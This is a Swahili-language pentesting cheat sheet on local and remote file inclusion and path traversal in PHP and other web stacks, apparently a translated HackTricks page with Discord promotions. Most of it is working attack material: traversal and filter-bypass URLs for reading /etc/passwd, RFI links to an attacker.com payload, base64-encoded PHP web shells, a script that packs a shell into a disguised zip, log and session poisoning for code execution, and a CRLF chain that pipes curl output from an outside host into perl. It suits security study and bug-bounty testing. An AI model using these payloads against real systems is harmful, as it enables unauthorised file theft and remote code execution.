File Inclusion/Path traversal

Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!

Hacking Insights Engage with content that delves into the thrill and challenges of hacking

Real-Time Hack News Keep up-to-date with fast-paced hacking world through real-time news and insights

Latest Announcements Stay informed with the newest bug bounties launching and crucial platform updates

Join us on Discord and start collaborating with top hackers today!

File Inclusion

Remote File Inclusion (RFI): Fail ni inayo load kutoka kwa seva ya mbali (Bora: Unaweza kuandika msimbo na seva itatekeleza). Katika php hii ni imezuiliwa kwa default (allow_url_include). Local File Inclusion (LFI): Seva inaload faili la ndani.

Uthibitisho wa udhaifu hutokea wakati mtumiaji anaweza kudhibiti kwa namna fulani faili ambalo litakuwa linaload na seva.

PHP functions zenye udhaifu: require, require_once, include, include_once

Zana ya kuvutia kutumia kutekeleza udhaifu huu: https://github.com/kurobeats/fimap

Blind - Interesting - LFI2RCE files

wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ

Linux

Kuchanganya orodha kadhaa za *nix LFI na kuongeza njia zaidi nimeunda hii:

Jaribu pia kubadilisha / kwa \ Jaribu pia kuongeza ../../../../../

Orodha inayotumia mbinu kadhaa kupata faili /etc/password (kuangalia kama udhaifu upo) inaweza kupatikana hapa

Windows

Mchanganyiko wa orodha tofauti:

Jaribu pia kubadilisha / kwa \ Jaribu pia kuondoa C:/ na kuongeza ../../../../../

Orodha inayotumia mbinu kadhaa kupata faili /boot.ini (kuangalia kama udhaifu upo) inaweza kupatikana hapa

OS X

Angalia orodha ya LFI ya linux.

Msingi wa LFI na njia za kupita

Mifano yote ni kwa ajili ya Local File Inclusion lakini inaweza kutumika pia kwa Remote File Inclusion (page=http://myserver.com/phpshellcode.txt\.

http://example.com/index.php?page=../../../etc/passwd

mfuatano wa kusafiri umeondolewa bila kurudi nyuma

http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd

Null byte (%00)

Pita zaidi ya kuongeza herufi zaidi mwishoni mwa mfuatano uliopewa (pita ya: $_GET['param']."php")

http://example.com/index.php?page=../../../etc/passwd%00

Hii ni imefanywa kuwa na ufumbuzi tangu PHP 5.4

Uandishi

Unaweza kutumia uandishi usio wa kawaida kama vile double URL encode (na wengine):

http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00

Kutoka kwenye folda iliyopo

Pengine upande wa nyuma unakagua njia ya folda:

http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd

Kuchunguza Maktaba za Mfumo wa Faili kwenye Seva

Mfumo wa faili wa seva unaweza kuchunguzwa kwa njia ya kurudi ili kubaini maktaba, si tu faili, kwa kutumia mbinu fulani. Mchakato huu unahusisha kubaini kina cha maktaba na kuchunguza uwepo wa folda maalum. Hapa kuna njia ya kina ya kufikia hili:

1. Baini Kina cha Maktaba: Thibitisha kina cha maktaba yako ya sasa kwa kufanikiwa kupata faili ya /etc/passwd (inatumika ikiwa seva ni ya Linux). Mfano wa URL unaweza kuundwa kama ifuatavyo, ikionyesha kina cha tatu:

http://example.com/index.php?page=../../../etc/passwd # depth of 3

1. Chunguza kwa Folda: Ongeza jina la folda inayoshukiwa (mfano, private) kwenye URL, kisha rudi kwenye /etc/passwd. Kiwango cha ziada cha saraka kinahitaji kuongeza kina kwa moja:

http://example.com/index.php?page=private/../../../../etc/passwd # depth of 3+1=4

1. Tafsiri Matokeo: Jibu la seva linaonyesha kama folda ipo:

• Kosa / Hakuna Matokeo: Folda private huenda haipo katika eneo lililotajwa.

• Maudhui ya /etc/passwd: Uwepo wa folda private umethibitishwa.

1. Uchunguzi wa Kurudi: Folda zilizogunduliwa zinaweza kuchunguzwa zaidi kwa ajili ya subdirectories au faili kwa kutumia mbinu ile ile au mbinu za jadi za Local File Inclusion (LFI).

Ili kuchunguza directories katika maeneo tofauti katika mfumo wa faili, badilisha payload ipasavyo. Kwa mfano, ili kuangalia kama /var/www/ ina folda private (ikiwa tunaweza kusema folda ya sasa iko kwenye kina cha 3), tumia:

http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd

Tekniki ya Kukata Njia

Kukata njia ni mbinu inayotumika kubadilisha njia za faili katika programu za wavuti. Mara nyingi hutumiwa kufikia faili zilizozuiliwa kwa kupita baadhi ya hatua za usalama ambazo zinaongeza wahusika wa ziada mwishoni mwa njia za faili. Lengo ni kuunda njia ya faili ambayo, mara itakapobadilishwa na hatua ya usalama, bado inaelekeza kwenye faili inayotakiwa.

Katika PHP, uwakilishi mbalimbali wa njia ya faili unaweza kuzingatiwa kuwa sawa kutokana na asili ya mfumo wa faili. Kwa mfano:

• /etc/passwd, /etc//passwd, /etc/./passwd, na /etc/passwd/ zote zinachukuliwa kama njia moja.

• Wakati wahusika 6 wa mwisho ni passwd, kuongeza / (kuifanya kuwa passwd/) hakubadilishi faili inayolengwa.

• Vivyo hivyo, ikiwa .php imeongezwa kwenye njia ya faili (kama shellcode.php), kuongeza /. mwishoni hakutabadilisha faili inayofikiwa.

Mifano iliyotolewa inaonyesha jinsi ya kutumia kukata njia kufikia /etc/passwd, lengo la kawaida kutokana na maudhui yake nyeti (taarifa za akaunti za mtumiaji):

http://example.com/index.php?page=a/../../../../../../../../../etc/passwd......[ADD MORE]....
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.

http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd

Katika hali hizi, idadi ya traversals inayohitajika inaweza kuwa karibu 2027, lakini nambari hii inaweza kutofautiana kulingana na usanidi wa seva.

• Kutumia Sehemu za Dot na Wahusika Wengine: Mfuatano wa traversal (../) uliochanganywa na sehemu za dot za ziada na wahusika unaweza kutumika kuzunguka mfumo wa faili, kwa ufanisi ukipuuza nyongeza za mfuatano kutoka kwa seva.

• Kujua Idadi Inayohitajika ya Traversals: Kupitia majaribio na makosa, mtu anaweza kupata idadi sahihi ya mfuatano wa ../ inayohitajika kuzunguka hadi kwenye saraka ya mzizi na kisha hadi /etc/passwd, kuhakikisha kwamba nyongeza zozote (kama vile .php) zimeondolewa lakini njia inayotakiwa (/etc/passwd) inabaki kama ilivyo.

• Kuanza na Saraka ya Uongo: Ni kawaida kuanza njia na saraka isiyokuwepo (kama a/). Mbinu hii inatumika kama hatua ya tahadhari au kutimiza mahitaji ya mantiki ya uchambuzi wa njia ya seva.

Wakati wa kutumia mbinu za kupunguza njia, ni muhimu kuelewa tabia ya uchambuzi wa njia ya seva na muundo wa mfumo wa faili. Kila hali inaweza kuhitaji mbinu tofauti, na majaribio mara nyingi yanahitajika ili kupata njia bora zaidi.

Ukatishaji huu ulirekebishwa katika PHP 5.3.

Hila za kupita chujio

http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Maintain the initial path: http://example.com/index.php?page=/var/www/../../etc/passwd
http://example.com/index.php?page=PhP://filter

Remote File Inclusion

Katika php hii imezimwa kwa default kwa sababu allow_url_include ni Off. Inapaswa kuwa On ili ifanye kazi, na katika kesi hiyo unaweza kujumuisha faili ya PHP kutoka kwa seva yako na kupata RCE:

http://example.com/index.php?page=http://atacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php

Ikiwa kwa sababu fulani allow_url_include iko On, lakini PHP inachuja ufikiaji wa kurasa za wavuti za nje, kulingana na chapisho hili, unaweza kutumia kwa mfano protokali ya data na base64 kufungua msimbo wa b64 PHP na kupata RCE:

PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt

Mfano mwingine usitumiaji itifaki ya php:// ungekuwa:

data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+txt

Python Root element

Katika python katika msimbo kama huu:

# file_name is controlled by a user
os.path.join(os.getcwd(), "public", file_name)

Ikiwa mtumiaji anatoa njia kamili kwa file_name, njia ya awali inatolewa tu:

os.path.join(os.getcwd(), "public", "/etc/passwd")
'/etc/passwd'

Ni tabia iliyokusudiwa kulingana na nyaraka:

Ikiwa kipengele ni njia kamili, vipengele vyote vya awali vinatupwa mbali na kuunganishwa kunaendelea kutoka kwa kipengele cha njia kamili.

Java Orodha ya Maktaba

Inaonekana kama una Path Traversal katika Java na unaomba maktaba badala ya faili, orodha ya maktaba inarudishwa. Hii haitatokea katika lugha nyingine (kama ninavyojua).

Vigezo 25 vya Juu

Hapa kuna orodha ya vigezo 25 vya juu ambavyo vinaweza kuwa na hatari ya kuingizwa kwa faili za ndani (LFI) (kutoka kiungo):

?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}

LFI / RFI kutumia PHP wrappers & protocols

php://filter

PHP filters huruhusu kufanya operesheni za mabadiliko kwenye data kabla ya kusomwa au kuandikwa. Kuna makundi 5 ya filters:

• String Filters:

• string.rot13

• string.toupper

• string.tolower

• string.strip_tags: Ondoa lebo kutoka kwenye data (kila kitu kati ya herufi "<" na ">")

• Kumbuka kwamba filter hii imeondolewa katika toleo za kisasa za PHP

• Conversion Filters

• convert.base64-encode

• convert.base64-decode

• convert.quoted-printable-encode

• convert.quoted-printable-decode

• convert.iconv.* : Hubadilisha kuwa encoding tofauti (convert.iconv.<input_enc>.<output_enc>). Ili kupata orodha ya encodings zote zinazoungwa mkono, endesha kwenye console: iconv -l

• Compression Filters

• zlib.deflate: Punguza maudhui (inayofaa ikiwa unatoa taarifa nyingi)

• zlib.inflate: Rejesha data

• Encryption Filters

• mcrypt.* : Imepitwa na wakati

• mdecrypt.* : Imepitwa na wakati

• Filters Nyingine

• Ukikimbia kwenye php var_dump(stream_get_filters()); unaweza kupata couple ya filters zisizotarajiwa:

• consumed

• dechunk: inarudisha encoding ya HTTP chunked

• convert.*

# String Filters
## Chain string.toupper, string.rot13 and string.tolower reading /etc/passwd
echo file_get_contents("php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd");
## Same chain without the "|" char
echo file_get_contents("php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd");
## string.string_tags example
echo file_get_contents("php://filter/string.strip_tags/resource=data://text/plain,<b>Bold</b><?php php code; ?>lalalala");

# Conversion filter
## B64 decode
echo file_get_contents("php://filter/convert.base64-decode/resource=data://plain/text,aGVsbG8=");
## Chain B64 encode and decode
echo file_get_contents("php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd");
## convert.quoted-printable-encode example
echo file_get_contents("php://filter/convert.quoted-printable-encode/resource=data://plain/text,£hellooo=");
=C2=A3hellooo=3D
## convert.iconv.utf-8.utf-16le
echo file_get_contents("php://filter/convert.iconv.utf-8.utf-16le/resource=data://plain/text,trololohellooo=");

# Compresion Filter
## Compress + B64
echo file_get_contents("php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd");
readfile('php://filter/zlib.inflate/resource=test.deflated'); #To decompress the data locally
# note that PHP protocol is case-inselective (that's mean you can use "PhP://" and any other varient)

Kutumia filters za php kama oracle kusoma faili zisizo za kawaida

Katika chapisho hili inapendekezwa mbinu ya kusoma faili ya ndani bila kupata matokeo kutoka kwa seva. Mbinu hii inategemea kuvuja kwa boolean ya faili (karakteri kwa karakteri) kwa kutumia filters za php kama oracle. Hii ni kwa sababu filters za php zinaweza kutumika kufanya maandiko kuwa makubwa vya kutosha ili kufanya php itupe makosa.

Katika chapisho la asili unaweza kupata maelezo ya kina ya mbinu, lakini hapa kuna muhtasari wa haraka:

• Tumia codec UCS-4LE kuacha karakteri inayoongoza ya maandiko mwanzoni na kufanya ukubwa wa mfuatano kuongezeka kwa kasi.

• Hii itatumika kuzalisha maandishi makubwa sana wakati herufi ya awali inakisiwa kwa usahihi kwamba php itasababisha kosa

• Filter ya dechunk itafuta kila kitu ikiwa karakteri ya kwanza si hexadecimal, hivyo tunaweza kujua ikiwa karakteri ya kwanza ni hex.

• Hii, ikichanganywa na ile ya awali (na filters nyingine kulingana na herufi iliyokisiwa), itaturuhusu kukisia herufi mwanzoni mwa maandiko kwa kuona wakati tunafanya mabadiliko ya kutosha ili kufanya isiwe karakteri ya hexadecimal. Kwa sababu ikiwa ni hex, dechunk haitafuta na bomu la awali litafanya php ikose.

• Codec convert.iconv.UNICODE.CP930 inabadilisha kila herufi kuwa ifuatayo (hivyo baada ya codec hii: a -> b). Hii inaturuhusu kugundua ikiwa herufi ya kwanza ni a kwa mfano kwa sababu ikiwa tutatumia 6 za codec hii a->b->c->d->e->f->g herufi haitakuwa tena karakteri ya hexadecimal, kwa hivyo dechunk haifutai na kosa la php linachochewa kwa sababu linazidisha na bomu la awali.

• Kutumia mabadiliko mengine kama rot13 mwanzoni inawezekana kuvuja herufi nyingine kama n, o, p, q, r (na codecs nyingine zinaweza kutumika kuhamasisha herufi nyingine kwenye eneo la hex).

• Wakati karakteri ya awali ni nambari inahitajika kuibadilisha kuwa base64 na kuvuja herufi 2 za kwanza ili kuvuja nambari.

• Problemu ya mwisho ni kuona jinsi ya kuvuja zaidi ya herufi ya awali. Kwa kutumia filters za kumbukumbu za mpangilio kama convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE inawezekana kubadilisha mpangilio wa herufi na kupata katika nafasi ya kwanza herufi nyingine za maandiko.

• Na ili kuwa na uwezo wa kupata data zaidi wazo ni kuunda bytes 2 za data za takataka mwanzoni kwa kutumia convert.iconv.UTF16.UTF16, tumia UCS-4LE ili kufanya iwe pivot na bytes 2 zinazofuata, na futa data hadi takataka (hii itafuta bytes 2 za kwanza za maandiko ya awali). Endelea kufanya hivi hadi ufikie kipande unachotaka kuvuja.

Katika chapisho zana ya kufanya hii kiotomatiki pia ilivuja: php_filters_chain_oracle_exploit.

php://fd

Wrapper hii inaruhusu kufikia waandishi wa faili ambao mchakato unao wazi. Inaweza kuwa na manufaa kuvuja maudhui ya faili zilizofunguliwa:

echo file_get_contents("php://fd/3");
$myfile = fopen("/etc/passwd", "r");

Unaweza pia kutumia php://stdin, php://stdout na php://stderr kufikia file descriptors 0, 1 na 2 mtawalia (sijui jinsi hii inaweza kuwa na manufaa katika shambulio)

zip:// na rar://

Pakia faili la Zip au Rar lenye PHPShell ndani na ulifike. Ili uweze kutumia protokali ya rar inahitaji kuiwezesha kwa njia maalum.

echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php

# To compress with rar
rar a payload.rar payload.php;
mv payload.rar shell.jpg;
rm payload.php
http://example.com/index.php?page=rar://shell.jpg%23payload.php

data://

http://example.net/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data://text/plain,<?php phpinfo(); ?>
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
http://example.net/?page=data:text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

Kumbuka kwamba protokali hii inakabiliwa na mipangilio ya php allow_url_open na allow_url_include

expect://

Expect inapaswa kuanzishwa. Unaweza kutekeleza msimbo kwa kutumia hii:

http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls

input://

Taja payload yako katika vigezo vya POST:

curl -XPOST "http://example.com/index.php?page=php://input" --data "<?php system('id'); ?>"

phar://

Faili la .phar linaweza kutumika kutekeleza msimbo wa PHP wakati programu ya wavuti inatumia kazi kama include kwa ajili ya kupakia faili. Kipande cha msimbo wa PHP kilichotolewa hapa chini kinaonyesha jinsi ya kuunda faili la .phar:

<?php
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); system("ls"); ?>');
$phar->stopBuffering();

Ili kuunda faili la .phar, amri ifuatayo inapaswa kutekelezwa:

php --define phar.readonly=0 create_path.php

Upon execution, a file named test.phar will be created, which could potentially be leveraged to exploit Local File Inclusion (LFI) vulnerabilities.

In cases where the LFI only performs file reading without executing the PHP code within, through functions such as file_get_contents(), fopen(), file(), file_exists(), md5_file(), filemtime(), or filesize(), exploitation of a deserialization vulnerability could be attempted. This vulnerability is associated with the reading of files using the phar protocol.

For a detailed understanding of exploiting deserialization vulnerabilities in the context of .phar files, refer to the document linked below:

Phar Deserialization Exploitation Guide

CVE-2024-2961

Iliwezekana kutumia faili yoyote isiyo na mpangilio inayosomwa kutoka PHP inayounga mkono vichujio vya php kupata RCE. Maelezo ya kina yanaweza kupatikana katika chapisho hili. Muhtasari wa haraka: kujaa kwa byte 3 katika heap ya PHP kulitumika kubadilisha mnyororo wa vipande vya bure vya ukubwa maalum ili kuweza kuandika chochote katika anwani yoyote, hivyo hook iliongezwa kuita system. Iliwezekana kugawa vipande vya ukubwa maalum kwa kutumia vichujio zaidi vya php.

More protocols

Check more possible protocols to include here:

• php://memory and php://temp — Andika katika kumbukumbu au katika faili ya muda (sijui jinsi hii inaweza kuwa na manufaa katika shambulio la kuingiza faili)

• file:// — Kufikia mfumo wa faili wa ndani

• http:// — Kufikia URL za HTTP(s)

• ftp:// — Kufikia URL za FTP(s)

• zlib:// — Mifereji ya Usawazishaji

• glob:// — Pata majina ya njia yanayolingana na muundo (Hairejeshi chochote kinachoweza kuchapishwa, hivyo si kweli yenye manufaa hapa)

• ssh2:// — Secure Shell 2

• ogg:// — Mifereji ya sauti (Siyo yenye manufaa kusoma faili zisizo na mpangilio)

LFI via PHP's 'assert'

Hatari za Local File Inclusion (LFI) katika PHP ni za juu sana wakati wa kushughulikia kazi ya 'assert', ambayo inaweza kutekeleza msimbo ndani ya nyuzi. Hii ni tatizo hasa ikiwa ingizo linalojumuisha wahusika wa kupita kwenye saraka kama ".." linakaguliwa lakini halijasafishwa ipasavyo.

Kwa mfano, msimbo wa PHP unaweza kubuniwa kuzuia kupita kwenye saraka kama ifuatavyo:

assert("strpos('$file', '..') === false") or die("");

Wakati hii inakusudia kuzuia traversal, inasababisha bila kukusudia vector ya kuingiza msimbo. Ili kutumia hii kusoma maudhui ya faili, mshambuliaji anaweza kutumia:

' and die(highlight_file('/etc/passwd')) or '

Vivyo hivyo, kwa kutekeleza amri za mfumo zisizo na mpangilio, mtu anaweza kutumia:

' and die(system("id")) or '

Ni muhimu kutoa URL-encode hizi payloads.

Jiunge na HackenProof Discord server ili kuwasiliana na hackers wenye uzoefu na hunters wa bug bounty!

Ujuzi wa Hacking Shiriki na maudhui yanayochunguza msisimko na changamoto za hacking

Habari za Hack kwa Wakati Halisi Endelea kuwa na habari za haraka katika ulimwengu wa hacking kupitia habari na ujuzi wa wakati halisi

Matangazo ya Karibuni Baki na habari kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa

Jiunge nasi kwenye Discord na anza kushirikiana na hackers bora leo!

PHP Blind Path Traversal

Katika post hii ya ajabu inaelezwa jinsi ya kutumia blind path traversal kupitia PHP filter ili kuondoa maudhui ya faili kupitia oracle ya makosa.

Kwa muhtasari, teknolojia inatumia "UCS-4LE" encoding kufanya maudhui ya faili kuwa makubwa kiasi kwamba PHP function inayofungua faili itasababisha makosa.

Kisha, ili kuvuja herufi ya kwanza, filter dechunk inatumika pamoja na nyingine kama base64 au rot13 na hatimaye filters convert.iconv.UCS-4.UCS-4LE na convert.iconv.UTF16.UTF-16BE zinatumika ili kweka herufi nyingine mwanzoni na kuvuja hizo.

Functions ambazo zinaweza kuwa na udhaifu: file_get_contents, readfile, finfo->file, getimagesize, md5_file, sha1_file, hash_file, file, parse_ini_file, copy, file_put_contents (tu lengo kusoma tu na hii), stream_get_contents, fgets, fread, fgetc, fgetcsv, fpassthru, fputs

Kwa maelezo ya kiufundi angalia post iliyotajwa!

LFI2RCE

Remote File Inclusion

Imepangwa hapo awali, fuata kiungo hiki.

Kupitia faili la log la Apache/Nginx

Ikiwa seva ya Apache au Nginx ni dhaifu kwa LFI ndani ya kazi ya kujumuisha unaweza kujaribu kufikia /var/log/apache2/access.log au /var/log/nginx/access.log, kuweka ndani ya user agent au ndani ya GET parameter shell ya php kama <?php system($_GET['c']); ?> na kujumuisha faili hiyo

Hii inaweza pia kufanywa katika log nyingine lakini kuwa makini, msimbo ndani ya log unaweza kuwa URL encoded na hii inaweza kuharibu Shell. Kichwa authorisation "basic" kina "user:password" katika Base64 na kinachambuliwa ndani ya log. PHPShell inaweza kuingizwa ndani ya kichwa hiki. Njia nyingine zinazowezekana za log:

/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log

Fuzzing wordlist: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI

Kupitia Barua Pepe

Tuma barua kwa akaunti ya ndani (user@localhost) yenye payload yako ya PHP kama <?php echo system($_REQUEST["cmd"]); ?> na jaribu kuingiza kwenye barua ya mtumiaji kwa njia kama /var/mail/<USERNAME> au /var/spool/mail/<USERNAME>

Kupitia /proc/*/fd/*

1. Pakia shells nyingi (kwa mfano: 100)

2. Jumuisha http://example.com/index.php?page=/proc/$PID/fd/$FD, ambapo $PID = PID ya mchakato (inaweza kulazimishwa) na $FD ni file descriptor (inaweza kulazimishwa pia)

Kupitia /proc/self/environ

Kama faili ya kumbukumbu, tuma payload katika User-Agent, itajitokeza ndani ya faili ya /proc/self/environ

GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>

Via upload

Ikiwa unaweza kupakia faili, ingiza tu payload ya shell ndani yake (e.g : <?php system($_GET['c']); ?>).

http://example.com/index.php?page=path/to/uploaded/file.png

Ili kuweka faili kuwa rahisi kusoma ni bora kuingiza kwenye metadata ya picha/doc/pdf

Kupitia upakuaji wa faili la Zip

Pakia faili la ZIP lililo na shell ya PHP iliyoshinikizwa na ufikie:

example.com/page.php?file=zip://path/to/zip/hello.zip%23rce.php

Via PHP sessions

Angalia kama tovuti inatumia PHP Session (PHPSESSID)

Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly

Katika PHP, vikao hivi vinahifadhiwa katika /var/lib/php5/sess\[PHPSESSID]_ faili

/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";

Seti cookie kuwa <?php system('cat /etc/passwd');?>

login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php

Tumia LFI kujumuisha faili la PHP session

login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2

Via ssh

Ikiwa ssh inafanya kazi angalia ni mtumiaji gani anatumika (/proc/self/status & /etc/passwd) na jaribu kufikia <HOME>/.ssh/id_rsa

Via vsftpd logs

Maktaba za seva ya FTP vsftpd ziko katika /var/log/vsftpd.log. Katika hali ambapo kuna udhaifu wa Local File Inclusion (LFI), na ufikiaji wa seva ya vsftpd iliyofichuliwa unaruhusiwa, hatua zifuatazo zinaweza kuzingatiwa:

1. Ingiza payload ya PHP katika uwanja wa jina la mtumiaji wakati wa mchakato wa kuingia.

2. Baada ya kuingiza, tumia LFI kupata maktaba za seva kutoka /var/log/vsftpd.log.

Via php base64 filter (using base64)

Kama ilivyoonyeshwa katika hii makala, PHP base64 filter inapuuzilia mbali Non-base64. Unaweza kutumia hiyo kupita ukaguzi wa kiendelezi cha faili: ikiwa unatoa base64 inayomalizika na ".php", itapuuzilia mbali "." na kuongezea "php" kwa base64. Hapa kuna mfano wa payload:

http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php

NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

Kupitia php filters (hakuna faili inahitajika)

Hii andika inaelezea kwamba unaweza kutumia php filters kuunda maudhui yasiyo na mipaka kama matokeo. Ambayo kimsingi inamaanisha kwamba unaweza kuunda msimbo wa php wa kiholela kwa ajili ya kuingiza bila kuhitaji kuandika kwenye faili.

Kupitia segmentation fault

Pakia faili ambayo itahifadhiwa kama ya muda katika /tmp, kisha katika ombio moja, trigger segmentation fault, na kisha faili ya muda haitafutwa na unaweza kuitafuta.

Kupitia Nginx hifadhi ya faili za muda

Ikiwa umepata Local File Inclusion na Nginx inafanya kazi mbele ya PHP unaweza kuwa na uwezo wa kupata RCE kwa kutumia mbinu ifuatayo:

Kupitia PHP_SESSION_UPLOAD_PROGRESS

Ikiwa umepata Local File Inclusion hata kama huna kikao na session.auto_start imewekwa Off. Ikiwa unatoa PHP_SESSION_UPLOAD_PROGRESS katika data ya multipart POST, PHP itafanya kikao kwa ajili yako. Unaweza kutumia hii vibaya kupata RCE:

Kupitia upakiaji wa faili za muda katika Windows

Ikiwa umepata Local File Inclusion na server inafanya kazi katika Windows unaweza kupata RCE:

Kupitia pearcmd.php + URL args

Kama ilivyoelezwa katika chapisho hili, script /usr/local/lib/phppearcmd.php inapatikana kwa default katika picha za docker za php. Zaidi ya hayo, inawezekana kupitisha hoja kwa script kupitia URL kwa sababu inabainishwa kwamba ikiwa param ya URL haina =, inapaswa kutumika kama hoja.

Ombi lifuatalo linaunda faili katika /tmp/hello.php yenye maudhui <?=phpinfo()?>:

GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1

Ifuatayo inatumia udhaifu wa CRLF kupata RCE (kutoka hapa):

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}orange.tw/x|perl) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a

Kupitia phpinfo() (file_uploads = on)

Ikiwa umepata Local File Inclusion na faili inayonyesha phpinfo() ikiwa file_uploads = on unaweza kupata RCE:

Kupitia compress.zlib + PHP_STREAM_PREFER_STUDIO + Path Disclosure

Ikiwa umepata Local File Inclusion na unaweza kuondoa njia ya faili ya muda LAKINI server inakagua ikiwa faili inayopaswa kujumuishwa ina alama za PHP, unaweza kujaribu kuepuka ukaguzi huo na Race Condition hii:

Kupitia kusubiri milele + bruteforce

Ikiwa unaweza kutumia LFI kupakia faili za muda na kufanya server kushindwa kutekeleza PHP, unaweza kisha kufanya brute force majina ya faili kwa masaa ili kupata faili ya muda:

Kwa Kosa la Kifo

Ikiwa unajumuisha yoyote ya faili /usr/bin/phar, /usr/bin/phar7, /usr/bin/phar.phar7, /usr/bin/phar.phar. (Unahitaji kujumuisha ile ile mara 2 ili kutupa kosa hilo).

Sijui hii ni ya manufaa vipi lakini inaweza kuwa. Hata kama unasababisha Kosa la Kifo la PHP, faili za muda za PHP zilizopakiwa zinafuta.

Marejeleo

• PayloadsAllTheThings\

• PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders

Jiunge na HackenProof Discord server kuwasiliana na hackers wenye uzoefu na wawindaji wa makosa!

Uelewa wa Udukuzi Shiriki na maudhui yanayochunguza msisimko na changamoto za udukuzi

Habari za Udukuzi wa Wakati Halisi Endelea kuwa na habari za hivi punde katika ulimwengu wa udukuzi kupitia habari na uelewa wa wakati halisi

Matangazo ya Hivi Punde Baki na habari kuhusu makosa mapya yanayoanzishwa na masasisho muhimu ya jukwaa

Jiunge nasi kwenye Discord na uanze kushirikiana na hackers bora leo!